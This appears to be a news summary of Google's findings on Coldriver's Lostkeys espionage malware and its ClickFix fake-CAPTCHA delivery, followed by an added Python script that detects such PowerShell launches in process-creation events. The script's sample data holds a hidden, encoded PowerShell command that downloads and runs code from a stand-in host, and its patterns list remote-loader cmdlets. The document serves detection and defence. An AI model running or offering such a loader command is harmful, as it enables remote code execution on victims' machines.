Google researchers have identified a new malware called Lostkeys, used by the Russian-backed hacking group Coldriver in espionage activities targeting high-profile individuals. This malware is delivered through a fake CAPTCHA site and is designed to steal files, credentials, and system information. (Affected: High-profile individuals, NATO-related organizations, diplomats, journalists)
Key points:
- Lostkeys is a malware used in espionage campaigns by Coldriver, a Russian government-backed hacking group.
- The group previously relied on credential-phishing campaigns and, more recently, custom malware such as the Spica backdoor to target specific individuals and organizations.
- Targets include diplomats, military advisers, journalists, and think tanks associated with NATO countries.
- The malware is delivered via a lure website mimicking a CAPTCHA verification page: the page copies a PowerShell command to the victim's clipboard and instructs them to paste it into the Windows Run dialog (the ClickFix pattern). Because the victim runs the first stage by hand, no malicious attachment or link payload passes through email attachment filters.
- Lostkeys can steal files, send system information, and exfiltrate credentials from targeted systems.
- Coldriver has been active since at least 2022, primarily targeting human rights organizations and civil society groups.
- The malware is deployed selectively, only against chosen high-value targets, which is consistent with an espionage collection role for Russian intelligence rather than broad criminal distribution.
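Google's report describes the fake CAPTCHA page copying a PowerShell command to the clipboard and prompting the victim to run it from the Windows Run dialog (the ClickFix pattern). That delivery leaves a characteristic process-creation trail: explorer.exe, which owns the Run dialog, spawning powershell.exe with a hidden window, an encoded command and a remote loader. The following detection script is an added example written for this page, not code from Google, The Record or the campaign itself; the sample events are constructed, and the field names, the stage-2 URL, the indicator names and the "interactive launch plus one more indicator" threshold are assumptions, not observed Lostkeys artifacts.

```python
"""Flag ClickFix-style launches: PowerShell started from the Run dialog
(parent explorer.exe) with evasion flags and a remote-load payload.
Added example; event fields mirror Sysmon Event ID 1 / Security 4688."""
import base64
import re

# -w hidden / -WindowStyle hidden keeps the console off the victim's screen
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob; the
# alternation is deliberately narrow so -ExecutionPolicy / -ep do not match
ENCODED_CMD = re.compile(
    r"(?<![\w-])-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# cmdlets and aliases that fetch and run code from a remote host
REMOTE_LOAD = re.compile(
    r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|iwr|"
    r"invoke-restmethod|irm|net\.webclient|start-bitstransfer)\b", re.I)


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE), or ''."""
    m = ENCODED_CMD.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event: dict) -> list[str]:
    """Return the indicator names that fire for one process-creation event."""
    image = event["image"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []
    hits = []
    # Win+R commands are spawned by explorer.exe, the shell that owns the Run dialog
    if event["parent_image"].lower().endswith("explorer.exe"):
        hits.append("launched_from_run_dialog")
    cmd = event["command_line"]
    if HIDDEN_WINDOW.search(cmd):
        hits.append("hidden_window")
    decoded = decode_encoded_command(cmd)
    if decoded:
        hits.append("encoded_command")
    # look for the remote loader in both the visible and the decoded command
    if REMOTE_LOAD.search(cmd) or REMOTE_LOAD.search(decoded):
        hits.append("remote_load")
    return hits


def is_clickfix_candidate(event: dict) -> bool:
    """An interactive Run-dialog launch is normal on its own; combined with a
    hidden window, encoding or a remote loader it matches the lure pattern.
    (Threshold is an assumption chosen for this example.)"""
    hits = analyze(event)
    return "launched_from_run_dialog" in hits and len(hits) >= 2


# --- constructed sample events (not real telemetry) ---------------------------
STAGE2_SCRIPT = "iex (New-Object Net.WebClient).DownloadString('http://captcha.example/verify')"
ENCODED_STAGE2 = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {   # a victim pasting the fake CAPTCHA's command into Win+R
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED_STAGE2}",
    },
    {   # scheduled maintenance script: not interactive, no evasion flags
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1",
    },
    {   # an admin typing a plain command into Win+R: interactive, nothing else
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "command_line": "pwsh.exe Get-ChildItem C:\\temp",
    },
]


def scan(events=SAMPLE_EVENTS) -> list[tuple[int, list[str]]]:
    """Return (index, indicators) for every event matching the pattern."""
    return [(i, analyze(e)) for i, e in enumerate(events) if is_clickfix_candidate(e)]


if __name__ == "__main__":
    for idx, hits in scan():
        print(f"event {idx}: ClickFix candidate, indicators={hits}")
```

Decoding the -EncodedCommand blob matters because the visible command line of a ClickFix launch often contains nothing but flags; the loader (iex plus a download cmdlet) only appears in the decoded script. Feed the same three fields from your EDR or Sysmon pipeline into analyze() and alert on is_clickfix_candidate(); the plain Run-dialog launch in the third sample is intentionally not flagged so ordinary administrator use does not page anyone.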
Read More: https://therecord.media/coldriver-russia-cyber-espionage-lostkeys-malware